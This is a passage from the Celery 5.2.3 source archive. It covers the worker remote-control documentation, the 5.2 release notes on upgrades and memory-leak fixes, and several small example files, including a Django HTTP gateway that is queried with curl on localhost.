or 0 if MainProcess. Where ``-n worker1@example.com -c2 -f %n-%i.log`` will result in three log files: - :file:`worker1-0.log` (main process) - :file:`worker1-1.log` (pool process 1) - :file:`worker1-2.log` (pool process 2) * ``%I`` - Pool process index with separator. Where ``-n worker1@example.com -c2 -f %n%I.log`` will result in three log files: - :file:`worker1.log` (main process) - :file:`worker1-1.log` (pool process 1) - :file:`worker1-2.log` (pool process 2) .. _worker-concurrency: Concurrency =========== By default multiprocessing is used to perform concurrent execution of tasks, but you can also use :ref:`Eventlet `. The number of worker processes/threads can be changed using the :option:`--concurrency ` argument and defaults to the number of CPUs available on the machine. .. admonition:: Number of processes (multiprocessing/prefork pool) More pool processes are usually better, but there's a cut-off point where adding more pool processes affects performance in negative ways. There's even some evidence to support that having multiple worker instances running, may perform better than having a single worker. For example 3 workers with 10 pool processes each. You need to experiment to find the numbers that works best for you, as this varies based on application, work load, task run times and other factors. .. _worker-remote-control: Remote control ============== .. versionadded:: 2.0 .. sidebar:: The ``celery`` command The :program:`celery` program is used to execute remote control commands from the command-line. It supports all of the commands listed below. See :ref:`monitoring-control` for more information. :pool support: *prefork, eventlet, gevent, thread*, blocking:*solo* (see note) :broker support: *amqp, redis* Workers have the ability to be remote controlled using a high-priority broadcast message queue. The commands can be directed to all, or a specific list of workers. Commands can also have replies. The client can then wait for and collect those replies. 
Since there's no central authority to know how many workers are available in the cluster, there's also no way to estimate how many workers may send a reply, so the client has a configurable timeout — the deadline in seconds for replies to arrive in. This timeout defaults to one second. If the worker doesn't reply within the deadline it doesn't necessarily mean the worker didn't reply, or worse is dead, but may simply be caused by network latency or the worker being slow at processing commands, so adjust the timeout accordingly. In addition to timeouts, the client can specify the maximum number of replies to wait for. If a destination is specified, this limit is set to the number of destination hosts. .. note:: The ``solo`` pool supports remote control commands, but any task executing will block any waiting control command, so it is of limited use if the worker is very busy. In that case you must increase the timeout waiting for replies in the client. .. _worker-broadcast-fun: The :meth:`~@control.broadcast` function ---------------------------------------------------- This is the client function used to send commands to the workers. Some remote control commands also have higher-level interfaces using :meth:`~@control.broadcast` in the background, like :meth:`~@control.rate_limit`, and :meth:`~@control.ping`. Sending the :control:`rate_limit` command and keyword arguments: .. code-block:: pycon >>> app.control.broadcast('rate_limit', ... arguments={'task_name': 'myapp.mytask', ... 'rate_limit': '200/m'}) This will send the command asynchronously, without waiting for a reply. To request a reply you have to use the `reply` argument: .. code-block:: pycon >>> app.control.broadcast('rate_limit', { ... 'task_name': 'myapp.mytask', 'rate_limit': '200/m'}, reply=True) [{'worker1.example.com': 'New rate limit set successfully'}, {'worker2.example.com': 'New rate limit set successfully'}, {'worker3.example.com': 'New rate limit set successfully'}] Using the `destination` argument you can specify a list of workers to receive the command: .. code-block:: pycon >>> app.control.broadcast('rate_limit', { ... 'task_name': 'myapp.mytask', ... 'rate_limit': '200/m'}, reply=True, ... destination=['worker1@example.com']) [{'worker1.example.com': 'New rate limit set successfully'}] Of course, using the higher-level interface to set rate limits is much more convenient, but there are commands that can only be requested using :meth:`~@control.broadcast`. Commands ======== .. control:: revoke ``revoke``: Revoking tasks -------------------------- :pool support: all, terminate only supported by prefork and eventlet :broker support: *amqp, redis* :command: :program:`celery -A proj control revoke ` All worker nodes keeps a memory of revoked task ids, either in-memory or persistent on disk (see :ref:`worker-persistent-revokes`). When a worker receives a revoke request it will skip executing the task, but it won't terminate an already executing task unless the `terminate` option is set. .. note:: The terminate option is a last resort for administrators when a task is stuck. It's not for terminating the task, it's for terminating the process that's executing the task, and that process may have already started processing another task at the point when the signal is sent, so for this reason you must never call this programmatically. If `terminate` is set the worker child process processing the task will be terminated. The default signal sent is `TERM`, but you can specify this using the `signal` argument. 
Signal can be the uppercase name of any signal defined in the :mod:`signal` module in the Python Standard Library. Terminating a task also revokes it. **Example** .. code-block:: pycon >>> result.revoke() >>> AsyncResult(id).revoke() >>> app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed') >>> app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed', ... terminate=True) >>> app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed', ... terminate=True, signal='SIGKILL') Revoking multiple tasks ----------------------- .. versionadded:: 3.1 The revoke method also accepts a list argument, where it will revoke several tasks at once. **Example** .. code-block:: pycon >>> app.control.revoke([ ... '7993b0aa-1f0b-4780-9af0-c47c0858b3f2', ... 'f565793e-b041-4b2b-9ca4-dca22762a55d', ... 'd9d35e03-2997-42d0-a13e-64a66b88a618', ]) The ``GroupResult.revoke`` method takes advantage of this since version 3.1. .. _worker-persistent-revokes: Persistent revokes ------------------ Revoking tasks works by sending a broadcast message to all the workers, the workers then keep a list of revoked tasks in memory. When a worker starts up it will synchronize revoked tasks with other workers in the cluster. The list of revoked tasks is in-memory so if all workers restart the list of revoked ids will also vanish. If you want to preserve this list between restarts you need to specify a file for these to be stored in by using the `--statedb` argument to :program:`celery worker`: .. code-block:: console $ celery -A proj worker -l INFO --statedb=/var/run/celery/worker.state or if you use :program:`celery multi` you want to create one file per worker instance so use the `%n` format to expand the current node name: .. code-block:: console celery multi start 2 -l INFO --statedb=/var/run/celery/%n.state See also :ref:`worker-files` Note that remote control commands must be working for revokes to work. Remote control commands are only supported by the RabbitMQ (amqp) and Redis at this point. .. _worker-time-limits: Time Limits =========== .. versionadded:: 2.0 :pool support: *prefork/gevent (see note below)* .. sidebar:: Soft, or hard? The time limit is set in two values, `soft` and `hard`. The soft time limit allows the task to catch an exception to clean up before it is killed: the hard timeout isn't catch-able and force terminates the task. A single task can potentially run forever, if you have lots of tasks waiting for some event that'll never happen you'll block the worker from processing new tasks indefinitely. The best way to defend against this scenario happening is enabling time limits. The time limit (`--time-limit`) is the maximum number of seconds a task may run before the process executing it is terminated and replaced by a new process. You can also enable a soft time limit (`--soft-time-limit`), this raises an exception the task can catch to clean up before the hard time limit kills it: .. code-block:: python from myapp import app from celery.exceptions import SoftTimeLimitExceeded @app.task def mytask(): try: do_work() except SoftTimeLimitExceeded: clean_up_in_a_hurry() Time limits can also be set using the :setting:`task_time_limit` / :setting:`task_soft_time_limit` settings. .. note:: Time limits don't currently work on platforms that don't support the :sig:`SIGUSR1` signal. .. note:: The gevent pool does not implement soft time limits. Additionally, it will not enforce the hard time limit if the task is blocking. Changing time limits at run-time -------------------------------- .. 
versionadded:: 2.3

:broker support: *amqp, redis*

There's a remote control command that enables you to change both soft and hard time limits for a task — named ``time_limit``.

Example changing the time limit for the ``tasks.crawl_the_web`` task to have a soft time limit of one minute, and a hard time limit of two minutes:

.. code-block:: pycon

    >>> app.control.time_limit('tasks.crawl_the_web',
                               soft=60, hard=120, reply=True)
    [{'worker1.example.com': {'ok': 'time limits set successfully'}}]

Only tasks that start executing after the time limit change will be affected.

.. _worker-rate-limits:

Rate Limits
===========

.. control:: rate_limit

Changing rate-limits at run-time
--------------------------------

Example changing the rate limit for the `myapp.mytask` task to execute at most 200 tasks of that type every minute:

.. code-block:: pycon

    >>> app.control.rate_limit('myapp.mytask', '200/m')

The above doesn't specify a destination, so the change request will affect all worker instances in the cluster. If you only want to affect a specific list of workers you can include the ``destination`` argument:

.. code-block:: pycon

    >>> app.control.rate_limit('myapp.mytask', '200/m',
    ...            destination=['celery@worker1.example.com'])

.. warning::

    This won't affect workers with the :setting:`worker_disable_rate_limits` setting enabled.

.. _worker-max-tasks-per-child:

Max tasks per child setting
===========================

.. versionadded:: 2.0

:pool support: *prefork*

With this option you can configure the maximum number of tasks a worker can execute before it's replaced by a new process. This is useful if you have memory leaks you have no control over, for example from closed-source C extensions. The option can be set using the worker's :option:`--max-tasks-per-child ` argument or using the :setting:`worker_max_tasks_per_child` setting.

.. _worker-max-memory-per-child:

Max memory per child setting
============================

.. versionadded:: 4.0

:pool support: *prefork*

With this option you can configure the maximum amount of resident memory a worker can use before it's replaced by a new process. This is useful if you have memory leaks you have no control over, for example from closed-source C extensions. The option can be set using the worker's :option:`--max-memory-per-child ` argument or using the :setting:`worker_max_memory_per_child` setting.

.. _worker-autoscaling:

Autoscaling
===========

.. versionadded:: 2.2

:pool support: *prefork*, *gevent*

The *autoscaler* component is used to dynamically resize the pool based on load:

- The autoscaler adds more pool processes when there is work to do,
- and starts removing processes when the workload is low.

It's enabled by the :option:`--autoscale ` option, which needs two numbers: the maximum and minimum number of pool processes:

.. code-block:: text

    --autoscale=AUTOSCALE
        Enable autoscaling by providing
        max_concurrency,min_concurrency. Example:
          --autoscale=10,3 (always keep 3 processes,
          but grow to 10 if necessary).

You can also define your own rules for the autoscaler by subclassing :class:`~celery.worker.autoscaler.Autoscaler`. Some ideas for metrics include load average or the amount of memory available. You can specify a custom autoscaler with the :setting:`worker_autoscaler` setting.

.. _worker-queues:

Queues
======

A worker instance can consume from any number of queues. By default it will consume from all queues defined in the :setting:`task_queues` setting (which, if not specified, falls back to the default queue named ``celery``).
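For reference, such a queue set is usually declared explicitly with the :setting:`task_queues` setting. The following is a minimal sketch rather than an excerpt from this guide: the queue names are hypothetical, while the setting and the :class:`kombu.Queue` class are real.

.. code-block:: python

    from kombu import Queue

    # Sketch: declare the queues this app knows about.
    app.conf.task_default_queue = 'default'
    app.conf.task_queues = (
        Queue('default', routing_key='default'),
        Queue('feeds', routing_key='feeds'),
    )

A worker started with ``-Q feeds`` would then consume only from the ``feeds`` queue, as described next.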
You can specify what queues to consume from at start-up, by giving a comma separated list of queues to the :option:`-Q ` option: .. code-block:: console $ celery -A proj worker -l INFO -Q foo,bar,baz If the queue name is defined in :setting:`task_queues` it will use that configuration, but if it's not defined in the list of queues Celery will automatically generate a new queue for you (depending on the :setting:`task_create_missing_queues` option). You can also tell the worker to start and stop consuming from a queue at run-time using the remote control commands :control:`add_consumer` and :control:`cancel_consumer`. .. control:: add_consumer Queues: Adding consumers ------------------------ The :control:`add_consumer` control command will tell one or more workers to start consuming from a queue. This operation is idempotent. To tell all workers in the cluster to start consuming from a queue named "``foo``" you can use the :program:`celery control` program: .. code-block:: console $ celery -A proj control add_consumer foo -> worker1.local: OK started consuming from u'foo' If you want to specify a specific worker you can use the :option:`--destination ` argument: .. code-block:: console $ celery -A proj control add_consumer foo -d celery@worker1.local The same can be accomplished dynamically using the :meth:`@control.add_consumer` method: .. code-block:: pycon >>> app.control.add_consumer('foo', reply=True) [{u'worker1.local': {u'ok': u"already consuming from u'foo'"}}] >>> app.control.add_consumer('foo', reply=True, ... destination=['worker1@example.com']) [{u'worker1.local': {u'ok': u"already consuming from u'foo'"}}] By now we've only shown examples using automatic queues, If you need more control you can also specify the exchange, routing_key and even other options: .. code-block:: pycon >>> app.control.add_consumer( ... queue='baz', ... exchange='ex', ... exchange_type='topic', ... routing_key='media.*', ... options={ ... 'queue_durable': False, ... 'exchange_durable': False, ... }, ... reply=True, ... destination=['w1@example.com', 'w2@example.com']) .. control:: cancel_consumer Queues: Canceling consumers --------------------------- You can cancel a consumer by queue name using the :control:`cancel_consumer` control command. To force all workers in the cluster to cancel consuming from a queue you can use the :program:`celery control` program: .. code-block:: console $ celery -A proj control cancel_consumer foo The :option:`--destination ` argument can be used to specify a worker, or a list of workers, to act on the command: .. code-block:: console $ celery -A proj control cancel_consumer foo -d celery@worker1.local You can also cancel consumers programmatically using the :meth:`@control.cancel_consumer` method: .. code-block:: console >>> app.control.cancel_consumer('foo', reply=True) [{u'worker1.local': {u'ok': u"no longer consuming from u'foo'"}}] .. control:: active_queues Queues: List of active queues ----------------------------- You can get a list of queues that a worker consumes from by using the :control:`active_queues` control command: .. code-block:: console $ celery -A proj inspect active_queues [...] Like all other remote control commands this also supports the :option:`--destination ` argument used to specify the workers that should reply to the request: .. code-block:: console $ celery -A proj inspect active_queues -d celery@worker1.local [...] This can also be done programmatically by using the :meth:`~celery.app.control.Inspect.active_queues` method: .. 
code-block:: pycon >>> app.control.inspect().active_queues() [...] >>> app.control.inspect(['worker1.local']).active_queues() [...] .. _worker-inspect: Inspecting workers ================== :class:`@control.inspect` lets you inspect running workers. It uses remote control commands under the hood. You can also use the ``celery`` command to inspect workers, and it supports the same commands as the :class:`@control` interface. .. code-block:: pycon >>> # Inspect all nodes. >>> i = app.control.inspect() >>> # Specify multiple nodes to inspect. >>> i = app.control.inspect(['worker1.example.com', 'worker2.example.com']) >>> # Specify a single node to inspect. >>> i = app.control.inspect('worker1.example.com') .. _worker-inspect-registered-tasks: Dump of registered tasks ------------------------ You can get a list of tasks registered in the worker using the :meth:`~celery.app.control.Inspect.registered`: .. code-block:: pycon >>> i.registered() [{'worker1.example.com': ['tasks.add', 'tasks.sleeptask']}] .. _worker-inspect-active-tasks: Dump of currently executing tasks --------------------------------- You can get a list of active tasks using :meth:`~celery.app.control.Inspect.active`: .. code-block:: pycon >>> i.active() [{'worker1.example.com': [{'name': 'tasks.sleeptask', 'id': '32666e9b-809c-41fa-8e93-5ae0c80afbbf', 'args': '(8,)', 'kwargs': '{}'}]}] .. _worker-inspect-eta-schedule: Dump of scheduled (ETA) tasks ----------------------------- You can get a list of tasks waiting to be scheduled by using :meth:`~celery.app.control.Inspect.scheduled`: .. code-block:: pycon >>> i.scheduled() [{'worker1.example.com': [{'eta': '2010-06-07 09:07:52', 'priority': 0, 'request': { 'name': 'tasks.sleeptask', 'id': '1a7980ea-8b19-413e-91d2-0b74f3844c4d', 'args': '[1]', 'kwargs': '{}'}}, {'eta': '2010-06-07 09:07:53', 'priority': 0, 'request': { 'name': 'tasks.sleeptask', 'id': '49661b9a-aa22-4120-94b7-9ee8031d219d', 'args': '[2]', 'kwargs': '{}'}}]}] .. note:: These are tasks with an ETA/countdown argument, not periodic tasks. .. _worker-inspect-reserved: Dump of reserved tasks ---------------------- Reserved tasks are tasks that have been received, but are still waiting to be executed. You can get a list of these using :meth:`~celery.app.control.Inspect.reserved`: .. code-block:: pycon >>> i.reserved() [{'worker1.example.com': [{'name': 'tasks.sleeptask', 'id': '32666e9b-809c-41fa-8e93-5ae0c80afbbf', 'args': '(8,)', 'kwargs': '{}'}]}] .. _worker-statistics: Statistics ---------- The remote control command ``inspect stats`` (or :meth:`~celery.app.control.Inspect.stats`) will give you a long list of useful (or not so useful) statistics about the worker: .. code-block:: console $ celery -A proj inspect stats For the output details, consult the reference documentation of :meth:`~celery.app.control.Inspect.stats`. Additional Commands =================== .. control:: shutdown Remote shutdown --------------- This command will gracefully shut down the worker remotely: .. code-block:: pycon >>> app.control.broadcast('shutdown') # shutdown all workers >>> app.control.broadcast('shutdown', destination='worker1@example.com') .. control:: ping Ping ---- This command requests a ping from alive workers. The workers reply with the string 'pong', and that's just about it. It will use the default one second timeout for replies unless you specify a custom timeout: .. 
code-block:: pycon >>> app.control.ping(timeout=0.5) [{'worker1.example.com': 'pong'}, {'worker2.example.com': 'pong'}, {'worker3.example.com': 'pong'}] :meth:`~@control.ping` also supports the `destination` argument, so you can specify the workers to ping: .. code-block:: pycon >>> ping(['worker2.example.com', 'worker3.example.com']) [{'worker2.example.com': 'pong'}, {'worker3.example.com': 'pong'}] .. _worker-enable-events: .. control:: enable_events .. control:: disable_events Enable/disable events --------------------- You can enable/disable events by using the `enable_events`, `disable_events` commands. This is useful to temporarily monitor a worker using :program:`celery events`/:program:`celerymon`. .. code-block:: pycon >>> app.control.enable_events() >>> app.control.disable_events() .. _worker-custom-control-commands: Writing your own remote control commands ======================================== There are two types of remote control commands: - Inspect command Does not have side effects, will usually just return some value found in the worker, like the list of currently registered tasks, the list of active tasks, etc. - Control command Performs side effects, like adding a new queue to consume from. Remote control commands are registered in the control panel and they take a single argument: the current :class:`~celery.worker.control.ControlDispatch` instance. From there you have access to the active :class:`~celery.worker.consumer.Consumer` if needed. Here's an example control command that increments the task prefetch count: .. code-block:: python from celery.worker.control import control_command @control_command( args=[('n', int)], signature='[N=1]', # <- used for help on the command-line. ) def increase_prefetch_count(state, n=1): state.consumer.qos.increment_eventually(n) return {'ok': 'prefetch count incremented'} Make sure you add this code to a module that is imported by the worker: this could be the same module as where your Celery app is defined, or you can add the module to the :setting:`imports` setting. Restart the worker so that the control command is registered, and now you can call your command using the :program:`celery control` utility: .. code-block:: console $ celery -A proj control increase_prefetch_count 3 You can also add actions to the :program:`celery inspect` program, for example one that reads the current prefetch count: .. code-block:: python from celery.worker.control import inspect_command @inspect_command() def current_prefetch_count(state): return {'prefetch_count': state.consumer.qos.value} After restarting the worker you can now query this value using the :program:`celery inspect` program: .. code-block:: console $ celery -A proj inspect current_prefetch_count ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/whatsnew-5.2.rst0000664000175000017500000003077700000000000016537 0ustar00asifasif00000000000000.. _whatsnew-5.2: ========================================= What's new in Celery 5.2 (Dawn Chorus) ========================================= :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. 
Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with Python. It's a task queue with a focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors; you should come join us :ref:`on IRC ` or :ref:`our mailing-list `.

.. note::

    Following the problems with Freenode, we migrated our IRC channel to Libera Chat as most projects did. You can also join us using `Gitter `_. We're sometimes there to answer questions. We welcome you to join.

To read more about Celery you should go read the :ref:`introduction `. While this version is **mostly** backward compatible with previous versions, it's important that you read the following section as this release is a new major version. This version is officially supported on CPython 3.7 & 3.8 & 3.9 and is also supported on PyPy3.

.. _`website`: http://celeryproject.org/

.. topic:: Table of Contents

    Make sure you read the important notes before upgrading to this version.

.. contents::
    :local:
    :depth: 2

Preface
=======

.. note::

    **This release contains fixes for two (potentially severe) memory leaks. We encourage our users to upgrade to this release as soon as possible.**

The 5.2.0 release is a new minor release for Celery.

Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_. This release has been codenamed `Dawn Chorus `_.

From now on we only support Python 3.7 and above. We will maintain compatibility with Python 3.7 until its EOL in June, 2023.

*— Omer Katz*

Long Term Support Policy
------------------------

We no longer support Celery 4.x as we don't have the resources to do so. If you'd like to help us, all contributions are welcome.

Celery 5.x **is not** an LTS release. We will support it until the release of Celery 6.x. We're in the process of defining our Long Term Support policy. Watch the next "What's New" document for updates.

Wall of Contributors
--------------------

.. note::

    This wall was automatically generated from git history, so sadly it doesn't include the people who help with more important things like answering mailing-list questions.

Upgrading from Celery 4.x
=========================

Step 1: Adjust your command line invocation
-------------------------------------------

Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible. The global options can no longer be positioned after the sub-command. Instead, they must be positioned as an option for the `celery` command like so::

    celery --app path.to.app worker

If you were using our :ref:`daemonizing` guide to deploy Celery in production, you should revisit it for updates.

Step 2: Update your configuration with the new setting names
------------------------------------------------------------

If you haven't already updated your configuration when you migrated to Celery 4.0, please do so now. We elected to extend the deprecation period until 6.0 since we did not loudly warn about using these deprecated settings. Please refer to the :ref:`migration guide ` for instructions.

Step 3: Read the important notes in this document
-------------------------------------------------

Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `. You should verify that none of the breaking changes in the CLI affect you.
Please refer to :ref:`New Command Line Interface ` for details. Step 4: Migrate your code to Python 3 ------------------------------------- Celery 5.x only supports Python 3. Therefore, you must ensure your code is compatible with Python 3. If you haven't ported your code to Python 3, you must do so before upgrading. You can use tools like `2to3 `_ and `pyupgrade `_ to assist you with this effort. After the migration is done, run your test suite with Celery 4 to ensure nothing has been broken. Step 5: Upgrade to Celery 5.2 ----------------------------- At this point you can upgrade your workers and clients with the new version. .. _v520-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python versions are: - CPython 3.7 - CPython 3.8 - CPython 3.9 - PyPy3.7 7.3 (``pypy3``) Experimental support ~~~~~~~~~~~~~~~~~~~~ Celery supports these Python versions provisionally as they are not production ready yet: - CPython 3.10 (currently in RC2) Memory Leak Fixes ----------------- Two severe memory leaks have been fixed in this version: * :class:`celery.result.ResultSet` no longer holds a circular reference to itself. * The prefork pool no longer keeps messages in its cache forever when the master process disconnects from the broker. The first memory leak occurs when you use :class:`celery.result.ResultSet`. Each instance held a promise which provides that instance as an argument to the promise's callable. This caused a circular reference which kept the ResultSet instance in memory forever since the GC couldn't evict it. The provided argument is now a :func:`weakref.proxy` of the ResultSet's instance. The memory leak mainly occurs when you use :class:`celery.result.GroupResult` since it inherits from :class:`celery.result.ResultSet` which doesn't get used that often. The second memory leak exists since the inception of the project. The prefork pool maintains a cache of the jobs it executes. When they are complete, they are evicted from the cache. However, when Celery disconnects from the broker, we flush the pool and discard the jobs, expecting that they'll be cleared later once the worker acknowledges them but that has never been the case. Instead, these jobs remain forever in memory. We now discard those jobs immediately while flushing. Dropped support for Python 3.6 ------------------------------ Celery now requires Python 3.7 and above. Python 3.6 will reach EOL in December, 2021. In order to focus our efforts we have dropped support for Python 3.6 in this version. If you still require to run Celery using Python 3.6 you can still use Celery 5.1. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 3.6 after the 23th of December, 2021. Tasks ----- When replacing a task with another task, we now give an indication of the replacing nesting level through the ``replaced_task_nesting`` header. A task which was never replaced has a ``replaced_task_nesting`` value of 0. Kombu ----- Starting from v5.2, the minimum required version is Kombu 5.2.0. Prefork Workers Pool --------------------- Now all orphaned worker processes are killed automatically when main process exits. Eventlet Workers Pool --------------------- You can now terminate running revoked tasks while using the Eventlet Workers Pool. Custom Task Classes ------------------- We introduced a custom handler which will be executed before the task is started called ``before_start``. 
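As a rough sketch, a custom task class can hook into this as shown below; the handler signature is the one documented in the Handlers section of the tasks guide, while the class and task names here are hypothetical.

.. code-block:: python

    from celery import Task

    class AuditedTask(Task):

        def before_start(self, task_id, args, kwargs):
            # Runs in the worker just before the task body executes.
            print('about to run {0}[{1}]'.format(self.name, task_id))

    @app.task(base=AuditedTask)
    def add(x, y):
        return x + y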
See :ref:`custom-task-cls-app-wide` for more details.

Important Notes From 5.0
------------------------

Dropped support for Python 2.7 & 3.5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Celery now requires Python 3.6 and above.

Python 2.7 reached EOL in January 2020. In order to focus our efforts we have dropped support for Python 2.7 in this version.

In addition, Python 3.5 reached EOL in September 2020. Therefore, we are also dropping support for Python 3.5.

If you still need to run Celery on Python 2.7 or Python 3.5, you can still use Celery 4.x. However, we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 2.7 or Python 3.5.

Eventlet Workers Pool
~~~~~~~~~~~~~~~~~~~~~

Due to `eventlet/eventlet#526 `_ the minimum required version is eventlet 0.26.1.

Gevent Workers Pool
~~~~~~~~~~~~~~~~~~~

Starting from v5.0, the minimum required version is gevent 1.0.0.

Couchbase Result Backend
~~~~~~~~~~~~~~~~~~~~~~~~

The Couchbase result backend now uses the V3 Couchbase SDK. As a result, we no longer support Couchbase Server 5.x.

Also, starting from v5.0, the minimum required version for the database client is couchbase 3.0.0.

To verify that your Couchbase Server is compatible with the V3 SDK, please refer to their `documentation `_.

Riak Result Backend
~~~~~~~~~~~~~~~~~~~

The Riak result backend has been removed as the database is no longer maintained. The Python client only supports Python 3.6 and below, which prevents us from supporting it, and the client itself is also unmaintained.

If you are still using Riak, refrain from upgrading to Celery 5.0 while you migrate your application to a different database.

We apologize for the lack of advance notice, but we feel that the chance you'll be affected by this breaking change is minimal, which is why we did it.

AMQP Result Backend
~~~~~~~~~~~~~~~~~~~

The AMQP result backend has been removed as it was deprecated in version 4.0.

Removed Deprecated Modules
~~~~~~~~~~~~~~~~~~~~~~~~~~

The `celery.utils.encoding` and the `celery.task` modules were deprecated in version 4.0 and are therefore removed in 5.0.

If you were using the `celery.utils.encoding` module before, you should import `kombu.utils.encoding` instead.

If you were using the `celery.task` module before, you should import directly from the `celery` module instead.

`azure-servicebus` 7.0.0 is now required
------------------------------------------

Given the SDK changes between 0.50.0 and 7.0.0, Kombu deprecates support for older `azure-servicebus` versions.

.. _v520-news:

Bug: Pymongo 3.12.1 is not compatible with Celery 5.2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For now we are limiting the Pymongo version, allowing only versions between 3.3.0 and 3.12.0.

This will be fixed in the next patch.

News
====

Support for invoking chords of unregistered tasks
--------------------------------------------------

Previously, if you attempted to publish a chord providing as its body a signature which wasn't registered in the Celery app publishing the chord, a :exc:`celery.exceptions.NotRegistered` exception would be raised.

From now on, you can publish these sorts of chords and they will be executed correctly:

..
code-block:: python # movies.task.publish_movie is registered in the current app movie_task = celery_app.signature('movies.task.publish_movie', task_id=str(uuid.uuid4()), immutable=True) # news.task.publish_news is *not* registered in the current app news_task = celery_app.signature('news.task.publish_news', task_id=str(uuid.uuid4()), immutable=True) my_chord = chain(movie_task, group(movie_task.set(task_id=str(uuid.uuid4())), movie_task.set(task_id=str(uuid.uuid4()))), news_task) my_chord.apply_async() # <-- No longer raises an exception Consul Result Backend --------------------- We now create a new client per request to Consul to avoid a bug in the Consul client. The Consul Result Backend now accepts a new :setting:`result_backend_transport_options` key: ``one_client``. You can opt out of this behavior by setting ``one_client`` to True. Please refer to the documentation of the backend if you're using the Consul backend to find out which behavior suites you. Filesystem Result Backend ------------------------- We now cleanup expired task results while using the filesystem result backend as most result backends do. ArangoDB Result Backend ----------------------- You can now check the validity of the CA certificate while making a TLS connection to ArangoDB result backend. If you'd like to do so, set the ``verify`` key in the :setting:`arangodb_backend_settings`` dictionary to ``True``. ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.703755 celery-5.2.3/examples/0000775000175000017500000000000000000000000014513 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/README.rst0000664000175000017500000000045700000000000016210 0ustar00asifasif00000000000000================= Celery Examples ================= * pythonproject Example Python project using celery. * httpexample Example project using remote tasks (webhook tasks) * celery_http_gateway Example HTTP service exposing the ability to apply tasks and query the resulting status/return value. ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.703755 celery-5.2.3/examples/app/0000775000175000017500000000000000000000000015273 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/app/myapp.py0000664000175000017500000000137100000000000016775 0ustar00asifasif00000000000000"""myapp.py Usage:: (window1)$ python myapp.py worker -l INFO (window2)$ python >>> from myapp import add >>> add.delay(16, 16).get() 32 You can also specify the app to use with the `celery` command, using the `-A` / `--app` option:: $ celery -A myapp worker -l INFO With the `-A myproj` argument the program will search for an app instance in the module ``myproj``. You can also specify an explicit name using the fully qualified form:: $ celery -A myapp:app worker -l INFO """ from celery import Celery app = Celery( 'myapp', broker='amqp://guest@localhost//', # ## add result backend here if needed. 
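# (Illustrative addition, not part of the original example.) A concrete result
# backend could be configured here instead, e.g.:
# backend='redis://localhost:6379/0'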
# backend='rpc' ) @app.task def add(x, y): return x + y if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.707755 celery-5.2.3/examples/celery_http_gateway/0000775000175000017500000000000000000000000020556 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/README.rst0000664000175000017500000000254600000000000022254 0ustar00asifasif00000000000000============================== Example Celery->HTTP Gateway ============================== This is an example service exposing the ability to apply tasks and query statuses/results over HTTP. Some familiarity with Django is recommended. `settings.py` contains the celery settings, you probably want to configure at least the broker related settings. To run the service you have to run the following commands:: $ python manage.py syncdb # (if running the database backend) $ python manage.py runserver The service is now running at http://localhost:8000 You can apply tasks, with the `/apply/` URL:: $ curl http://localhost:8000/apply/celery.ping/ {"ok": "true", "task_id": "e3a95109-afcd-4e54-a341-16c18fddf64b"} Then you can use the resulting task-id to get the return value:: $ curl http://localhost:8000/e3a95109-afcd-4e54-a341-16c18fddf64b/status/ {"task": {"status": "SUCCESS", "result": "pong", "id": "e3a95109-afcd-4e54-a341-16c18fddf64b"}} If you don't want to expose all tasks there're a few possible approaches. For instance you can extend the `apply` view to only accept a white-list. Another possibility is to just make views for every task you want to expose. We made on such view for ping in `views.ping`:: $ curl http://localhost:8000/ping/ {"ok": "true", "task_id": "383c902c-ba07-436b-b0f3-ea09cc22107c"} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/__init__.py0000664000175000017500000000000000000000000022655 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/manage.py0000664000175000017500000000060100000000000022355 0ustar00asifasif00000000000000#!/usr/bin/env python from django.core.management import execute_manager try: import settings # Assumed to be in the same directory. except ImportError: import sys sys.stderr.write( "Error: Can't find the file 'settings.py' in the directory " "containing {!r}.".format(__file__)) sys.exit(1) if __name__ == '__main__': execute_manager(settings) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/examples/celery_http_gateway/settings.py0000664000175000017500000000567100000000000023001 0ustar00asifasif00000000000000import django # Django settings for celery_http_gateway project. 
